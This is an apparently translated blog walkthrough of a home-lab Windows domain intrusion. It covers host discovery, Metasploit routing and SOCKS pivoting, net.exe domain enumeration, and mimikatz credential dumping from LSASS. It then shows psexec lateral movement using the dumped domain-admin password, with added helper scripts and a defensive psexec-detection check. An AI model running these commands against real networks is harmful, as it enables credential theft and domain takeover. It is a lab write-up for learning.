Notes on a simple domain penetration (part 1)

1. Environment

The domain environment is self-built and roughly imitates an enterprise deployment.

Domain: learn.com

OS type          IP address               Local account / password   Domain account / password        Role
Windows 2008 R2  192.168.138.129          Administrator /            learn\Administrator /            DC (domain controller)
                                          [email protected]          [email protected]
Windows 2003     NIC 1: 192.168.138.130   Administrator / root       learn\win2003 / win@2003         Domain member / external web server
                 NIC 2: 192.168.47.159
Windows XP       192.168.138.131          Administrator / root       learn\winxp / [email protected]   Domain member

2. Penetration steps

ps: Since this is an internal-network test, the earlier steps of getting from the external network into the intranet are omitted. That is, we assume the attacker already controls the Windows 2003 host.

2.1 Information collection

2.1.1 IP-domain information

Information summary
Account:                learn\win2003
Domain:                 learn.com
Intranet IP:            192.168.138.130
External IP:            192.168.47.159
Domain controller (DC): 192.168.138.129
Other domain host:      192.168.138.131

C:\Documents and Settings\win2003\Desktop>ping learn.com

Pinging learn.com [192.168.138.129] with 32 bytes of data:
Reply from 192.168.138.129: bytes=32 time<1ms TTL=128

Pinging the domain name resolves to the DC (a DC registers the domain's A record in its own DNS), and TTL=128 is consistent with a Windows host one hop or less away.


Intranet host discovery:
1. In the meterpreter shell run: for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.138.%I | findstr "TTL="
2. Add a route and a SOCKS proxy through the session, then scan the intranet from the attacker box (see section 2.1.2)
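The one-liner above leaves a wall of "Reply from ..." lines on the screen. The following helper, an added example that is not part of the original post, turns that output into a de-duplicated host list and uses the TTL to guess the OS family (64 = Linux/Unix, 128 = Windows, 255 = network gear), which is what decides which hosts are worth the SMB/RDP scans and the psexec step later on. The sample sweep output is constructed for this example, not captured from the lab.

```python
import re
from collections import OrderedDict

# Constructed sample (not real output from the lab): the lines that
#   for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.138.%I | findstr "TTL="
# leaves on screen after findstr has dropped timeouts and unreachable replies.
SAMPLE_SWEEP = """\
Reply from 192.168.138.1: bytes=32 time=2ms TTL=64
Reply from 192.168.138.129: bytes=32 time<1ms TTL=128
Reply from 192.168.138.130: bytes=32 time<1ms TTL=128
Reply from 192.168.138.131: bytes=32 time=1ms TTL=128
Reply from 192.168.138.131: bytes=32 time=1ms TTL=128
Reply from 192.168.138.254: bytes=32 time=3ms TTL=255
"""

# English-locale ping output. A Chinese-locale host prints the same fields with a
# localised prefix, so the leading "Reply from" would have to be adapted there.
REPLY_RE = re.compile(
    r"^Reply from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}): bytes=\d+ time[<=](?P<rtt>\d+)ms TTL=(?P<ttl>\d+)$"
)

# Default initial TTLs of the common OS families. A reply's TTL is the initial
# value minus the number of routers crossed, so the smallest initial value that
# is >= the observed TTL is the best guess.
INITIAL_TTLS = ((64, "Linux/Unix"), (128, "Windows"), (255, "network device/Solaris"))


def guess_os(ttl):
    """Return (os_family, hops) for an observed TTL, or ("unknown", None)."""
    for initial, family in INITIAL_TTLS:
        if ttl <= initial:
            return family, initial - ttl
    return "unknown", None


def parse_ping_sweep(text):
    """Turn the raw sweep output into {ip: {"ttl", "rtt_ms", "os_hint", "hops"}},
    de-duplicating hosts that answered more than once."""
    hosts = OrderedDict()
    for line in text.splitlines():
        m = REPLY_RE.match(line.strip())
        if not m:
            continue  # findstr already filtered most noise; ignore anything else
        ttl = int(m.group("ttl"))
        family, hops = guess_os(ttl)
        hosts[m.group("ip")] = {
            "ttl": ttl,
            "rtt_ms": int(m.group("rtt")),
            "os_hint": family,
            "hops": hops,
        }
    return hosts


def windows_targets(hosts):
    """IPs worth feeding into the SMB/RDP scans and the psexec step later on."""
    return [ip for ip, info in hosts.items() if info["os_hint"] == "Windows"]


if __name__ == "__main__":
    found = parse_ping_sweep(SAMPLE_SWEEP)
    for ip, info in found.items():
        print(f"{ip:<16} TTL={info['ttl']:<3} {info['os_hint']} ({info['hops']} hop(s) away)")
    print("Windows candidates:", windows_targets(found))
```

Paste the real sweep output into `SAMPLE_SWEEP` (or read it from a file) and the Windows candidate list is the input for the port scans in 2.1.2.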


2.1.2 Establish routing-proxy

run autoroute -s 192.168.138.0/24      # add a route to the intranet segment through the current session
run autoroute -p                       # print the routing table to confirm the route is active

Method 1: msf's built-in scanning modules

Host discovery (try them and compare the results; note that arp_sweep sends raw Ethernet frames, so it only works on a segment the attacker box is directly attached to, never through the pivot route):
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/netbios/nbname
use auxiliary/scanner/portscan/tcp
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep

Port scanning:
use auxiliary/scanner/portscan/ack

Service scanning: pick whichever modules fit:
search auxiliary/scanner/


Method 2: set up proxychains

use auxiliary/server/socks4a
set SRVPORT 3333
run

vi /etc/proxychains.conf
socks4 192.168.47.147 3333

sudo proxychains3 nmap -Pn -sT 192.168.138.0/24      # a SOCKS proxy only carries full TCP connections, so use -sT (connect scan) and -Pn (no ICMP/ARP ping is possible through it); a SYN scan (-sS) bypasses proxychains and never reaches the intranet. A whole /24 over the pivot is slow and unreliable, so in practice restrict the sweep to a few common ports
sudo proxychains3 nmap -Pn -sT 192.168.138.129 -p 3389,445
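To see why only connect scans survive the pivot, here is the exchange proxychains performs for every `connect()` it hooks, written out as an added example (not code from the original post or from Metasploit). It builds the SOCKS4/4a CONNECT request that auxiliary/server/socks4a accepts, parses the 8-byte reply, and uses the two to do a plain TCP connect scan of the DC's 445/3389 from the attacker box. The proxy address 192.168.47.147:3333 is taken from the page's configuration; the request carries only a destination and a port, which is exactly why there is no way to push a raw SYN through it.

```python
import socket
import struct

SOCKS4_VERSION = 0x04
SOCKS4_CMD_CONNECT = 0x01
SOCKS4_REPLY_GRANTED = 0x5A   # 0x5B..0x5D are the failure codes

# Lab values from the page: msf's socks4a server listening on the attacker box.
PROXY = ("192.168.47.147", 3333)


def build_socks4a_connect(host, port, user_id=b""):
    """Build the CONNECT request proxychains sends for every connect() it hooks.

    A dotted IPv4 address goes into the DSTIP field (plain SOCKS4). Anything
    else uses the 4a extension: DSTIP = 0.0.0.1 and the hostname is appended
    after the user id so the proxy (the pivot host) resolves it. The request
    only names (ip, port); a raw SYN scan has nothing to put here, so nmap
    must run with -sT behind proxychains.
    """
    try:
        dst_ip = socket.inet_aton(host)
        hostname_tail = b""
    except OSError:
        dst_ip = b"\x00\x00\x00\x01"
        hostname_tail = host.encode("ascii") + b"\x00"
    header = struct.pack("!BBH4s", SOCKS4_VERSION, SOCKS4_CMD_CONNECT, port, dst_ip)
    return header + user_id + b"\x00" + hostname_tail


def parse_socks4_reply(data):
    """Return (granted, code) from the 8-byte reply; VN is always 0 in replies."""
    if len(data) < 8:
        raise ValueError("short SOCKS4 reply: %r" % (data,))
    vn, code, _port, _ip = struct.unpack("!BBH4s", data[:8])
    if vn != 0:
        raise ValueError("unexpected reply version %d" % vn)
    return code == SOCKS4_REPLY_GRANTED, code


def connect_scan(targets, proxy=PROXY, timeout=3.0):
    """Full TCP connect scan of (host, port) pairs through the SOCKS4a pivot."""
    results = {}
    for host, port in targets:
        try:
            with socket.create_connection(proxy, timeout=timeout) as s:
                s.sendall(build_socks4a_connect(host, port))
                granted, code = parse_socks4_reply(s.recv(8))
                results[(host, port)] = "open" if granted else "closed/filtered (code 0x%02x)" % code
        except OSError as exc:
            results[(host, port)] = "proxy error: %s" % exc
    return results


if __name__ == "__main__":
    # The same two checks the page runs with nmap against the DC.
    for (host, port), state in connect_scan([("192.168.138.129", 445), ("192.168.138.129", 3389)]).items():
        print("%s:%d %s" % (host, port, state))
```

A granted reply (code 0x5A) means the pivot host completed the three-way handshake with the target, so "open" here has the same meaning as an nmap -sT "open"; a 0x5B reply cannot distinguish closed from filtered, which is another reason to keep scans through a pivot small and targeted.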


2.1.3 Domain user information collection

Common commands

ipconfig /all                                   show the local IP configuration and the domain this host belongs to
route print                                     print the routing table
arp -a                                          show the ARP cache
net view                                        list other host names on the local network
net start                                       list the services that are running
net share                                       list the shares this host exposes
net share ipc$                                  show the IPC$ share
net share c$                                    show the C$ share
net use \\192.168.xx.xx\ipc$ "" /user:""        establish a null session with 192.168.xx.xx
net use \\192.168.xx.xx\c$ "password" /user:"username"   map the C$ share of 192.168.xx.xx with credentials
dir \\192.168.xx.xx\c$\user                     list the files under C:\user on 192.168.xx.xx

net config Workstation                          show computer name, full name, user name, OS version, workstation, domain and logon domain
net user                                        list local users
net user /domain                                list domain users
net localgroup administrators                   list the local Administrators group (it usually contains domain users)
net view /domain                                list the domains that are visible
net user <username> /domain                     show the details of the given domain user
net group /domain                               list the groups in the domain (the query is forwarded to the DC, so it also works from a domain member; only the plain "net group" without /domain is restricted to a DC)
net group <groupname> /domain                   list the members of a domain group
net group "domain admins" /domain               list the domain administrators
net group "domain computers" /domain            list the other hosts joined to the domain
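The net.exe output is meant for eyes, not scripts: `net user` and `net group` pack names three per line in 25-character columns, `net localgroup` prints one member per line, and both end with a "The command completed successfully." trailer. The parser below is an added example (not from the original post) that reads those layouts and answers the question the list above is really asking: which domain principals hold local admin on this host, and which of them are Domain Admins. The three outputs are constructed for this example to match the lab's accounts (English locale; the NetBIOS domain name LEARN is assumed).

```python
# Constructed sample outputs (made up for this example, English Windows locale)
# of three of the commands listed above, as they would look on the win2003 host.
NET_USER_DOMAIN = """\
The request will be processed at a domain controller for domain learn.com.

User accounts for \\\\dc.learn.com

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt
win2003                  winxp
The command completed successfully.
"""

NET_GROUP_DOMAIN_ADMINS = """\
The request will be processed at a domain controller for domain learn.com.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
"""

NET_LOCALGROUP_ADMINISTRATORS = """\
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
LEARN\\Domain Admins
LEARN\\win2003
The command completed successfully.
"""

COLUMN_WIDTH = 25  # net user / net group print names left-justified in 25-character columns


def parse_net_names(output, columnar=True):
    """Return the names listed between the dashed separator and the
    'The command completed successfully.' trailer.

    net user and net group pack up to three names per line in fixed-width
    columns, so each line is sliced rather than split on whitespace (a name
    containing a space would otherwise be broken in two). net localgroup
    prints one member per line; pass columnar=False for it.
    """
    names = []
    in_list = False
    for raw in output.splitlines():
        line = raw.rstrip()
        if not in_list:
            in_list = line.startswith("-----")
            continue
        if line.startswith("The command completed"):
            break
        if not line.strip():
            continue
        if columnar:
            cells = [line[i:i + COLUMN_WIDTH].strip() for i in range(0, len(line), COLUMN_WIDTH)]
            names.extend(c for c in cells if c)
        else:
            names.append(line.strip())
    return names


def domain_members_of_local_admins(localgroup_output, netbios_domain):
    """Entries of the local Administrators group that come from the domain,
    i.e. the DOMAIN\\name lines (the reason the list above says this group
    usually contains domain users)."""
    prefix = netbios_domain.upper() + "\\"
    return [n for n in parse_net_names(localgroup_output, columnar=False)
            if n.upper().startswith(prefix)]


def interesting_local_admins(localgroup_output, domain_admins, netbios_domain="LEARN"):
    """Domain principals with local admin on this host, tagged with whether they
    are Domain Admins (directly, or because the Domain Admins group itself is
    a member). A True entry means a logon by that account leaves domain-admin
    credentials on this box."""
    da = {a.lower() for a in domain_admins}
    tagged = []
    for entry in domain_members_of_local_admins(localgroup_output, netbios_domain):
        name = entry.split("\\", 1)[1]
        tagged.append((entry, name.lower() == "domain admins" or name.lower() in da))
    return tagged


if __name__ == "__main__":
    print("domain users:", parse_net_names(NET_USER_DOMAIN))
    admins = parse_net_names(NET_GROUP_DOMAIN_ADMINS)
    print("domain admins:", admins)
    for entry, is_da in interesting_local_admins(NET_LOCALGROUP_ADMINISTRATORS, admins):
        print("local admin from domain:", entry, "(Domain Admin)" if is_da else "")
```

Feed the real command output in through `subprocess.run(["net", "user", "/domain"], capture_output=True, text=True).stdout` on the compromised host, or paste the text captured from the meterpreter shell; the fixed-width slicing is what keeps the parser from mangling the output when a name is wider than the usual one-word sAMAccountName.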

MSF modules

run post/windows/gather/enum_ad_computers
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ad_groups

run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domain_users
run post/windows/gather/enum_domains

Information summary
Domain: learn.com
Domain users: Administrator   Guest   krbtgt   win2003   winxp

Use the mimikatz extension built into msf to extract account passwords

load mimikatz  # load the mimikatz extension (legacy; current Metasploit releases ship the same functionality as `load kiwi`, with creds_all / creds_wdigest)
help           # list the commands

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds.   # credentials cached by the Kerberos provider (domain accounts)
    livessp           Attempt to retrieve livessp creds.
    mimikatz_command  Run a custom command.
    msv               Attempt to retrieve msv creds (hashes).
    ssp               Attempt to retrieve ssp creds.
    tspkg             Attempt to retrieve tspkg creds.
    wdigest           Attempt to retrieve wdigest creds.    # plaintext passwords cached in LSASS by the WDigest provider

meterpreter >

All of these read LSASS memory, so the meterpreter session has to run as SYSTEM (or at least hold SeDebugPrivilege); run getsystem first if the session was obtained as a normal user.


Thinking: once inside the intranet, what we really want is domain administrator privileges. Two routes lead there: forge Kerberos tickets for a PTT (pass-the-ticket) attack, or obtain a domain administrator's plaintext password directly.
(This assumes the hosts in the domain have no system-level or common service vulnerabilities that could be exploited instead.)

2.2 Lateral movement of the intranet

2.2.1 Dump plaintext passwords from memory

In this lab the domain administrator account was deliberately used to log on to the win2003 external web server, so that its credentials are cached in memory and can be dumped.

This yields the domain administrator's account and password: Administrator/[email protected]. From here the whole intranet is basically reachable!

For example, host discovery already showed another intranet host, 192.168.138.131.
A quick demonstration:
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp   # inside an intranet outbound connections are often filtered, so the bind_* payloads are usually the safer choice
set rhosts 192.168.138.131
set smbdomain learn.com
set smbuser Administrator
set smbpass [email protected]
set lport 5556                             # with a bind payload this is the port the target listens on; msf reaches it through the autoroute added earlier
exploit
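psexec-style lateral movement is loud on the target: it installs a service, which Windows records as System event ID 7045 ("A service was installed in the system"), whether the tool is Sysinternals PsExec or exploit/windows/smb/psexec. The check below is an added example (not from the original post) of the detection a defender would run over those records: it flags the PSEXESVC service name, a service binary served from an admin share, a service that launches encoded PowerShell, and random-looking eight-letter service names. The log records are constructed for this example and flattened to one line each; the allowlist of known service names is an assumption a real deployment would replace with its own.

```python
import re

# Constructed System-log records (made up for this example), one per line in the
# shape  "<time> 7045 ServiceName=<...> ImagePath=<...> Account=<...>".
SAMPLE_7045 = """\
2020-11-11T10:02:14Z 7045 ServiceName=Sysmon64 ImagePath=C:\\Windows\\Sysmon64.exe Account=LocalSystem
2020-11-11T10:05:41Z 7045 ServiceName=PSEXESVC ImagePath=%SystemRoot%\\PSEXESVC.exe Account=LocalSystem
2020-11-11T10:07:03Z 7045 ServiceName=XmyUwLjt ImagePath=\\\\127.0.0.1\\ADMIN$\\XmyUwLjt.exe Account=LocalSystem
2020-11-11T10:09:27Z 7045 ServiceName=kRdPqZwN ImagePath=%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e SQBFAFgA Account=LocalSystem
2020-11-11T11:00:00Z 7045 ServiceName=WinDefend ImagePath="C:\\Program Files\\Windows Defender\\MsMpEng.exe" Account=LocalSystem
"""

RECORD_RE = re.compile(
    r"^(?P<ts>\S+) 7045 ServiceName=(?P<name>\S+) ImagePath=(?P<path>.*) Account=(?P<acct>\S+)$"
)
# \\host\ADMIN$\... or \\host\C$\... : the binary was dropped over an admin share
ADMIN_SHARE_RE = re.compile(r"\\\\[^\\]+\\(ADMIN|[A-Za-z])\$\\", re.IGNORECASE)
# powershell ... -e/-enc/-encodedcommand <base64>
ENCODED_PS_RE = re.compile(r"powershell(\.exe)?.*\s-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)
RANDOM_NAME_RE = re.compile(r"^[A-Za-z]{8}$")
# Assumed site allowlist; a real deployment maintains its own.
KNOWN_SERVICES = {"sysmon64", "windefend"}


def parse_7045(text):
    """Parse the flattened records into dicts with ts/name/path/acct."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def suspicious_reasons(name, path):
    """Return the list of reasons a 7045 record looks like psexec-style lateral movement."""
    reasons = []
    if name.upper() == "PSEXESVC":
        reasons.append("Sysinternals PsExec service name")
    if ADMIN_SHARE_RE.search(path):
        reasons.append("service binary served from an admin share")
    if ENCODED_PS_RE.search(path):
        reasons.append("service launches encoded PowerShell")
    looks_random = (RANDOM_NAME_RE.match(name) and name != name.lower()
                    and name != name.upper() and name.lower() not in KNOWN_SERVICES)
    if looks_random:
        reasons.append("random-looking 8-letter service name")
    return reasons


def hunt_psexec(text):
    """Run the checks over a log extract and return the flagged service installs."""
    hits = []
    for rec in parse_7045(text):
        reasons = suspicious_reasons(rec["name"], rec["path"])
        if reasons:
            hits.append({"ts": rec["ts"], "name": rec["name"], "path": rec["path"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in hunt_psexec(SAMPLE_7045):
        print(hit["ts"], hit["name"], "->", "; ".join(hit["reasons"]))
```

On the offensive side the same list reads as the artifacts the psexec module leaves behind: the service name and binary are random, the binary sits on an admin share, and the service runs as LocalSystem, so expect 7045 (and a 4624 type 3 logon from the pivot host) to be visible to any SOC that collects the System log.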


3. Summary

Caveat: in practice a plaintext password is often not available. Medium and large enterprises have largely retired hosts older than Windows 2008, and from Windows 8.1 / Server 2012 R2 onward (and on older systems patched with KB2871997 and UseLogonCredential set to 0) WDigest no longer caches plaintext credentials in LSASS.

The next step is therefore PTH (pass-the-hash) and PTT (pass-the-ticket) attacks.
Tired of writing; let's leave it here for now!

The PTH and PTT part will be added later; look forward to it!
PTH and PTT attacks

Source: blog.csdn.net/qq_42342141/article/details/109638205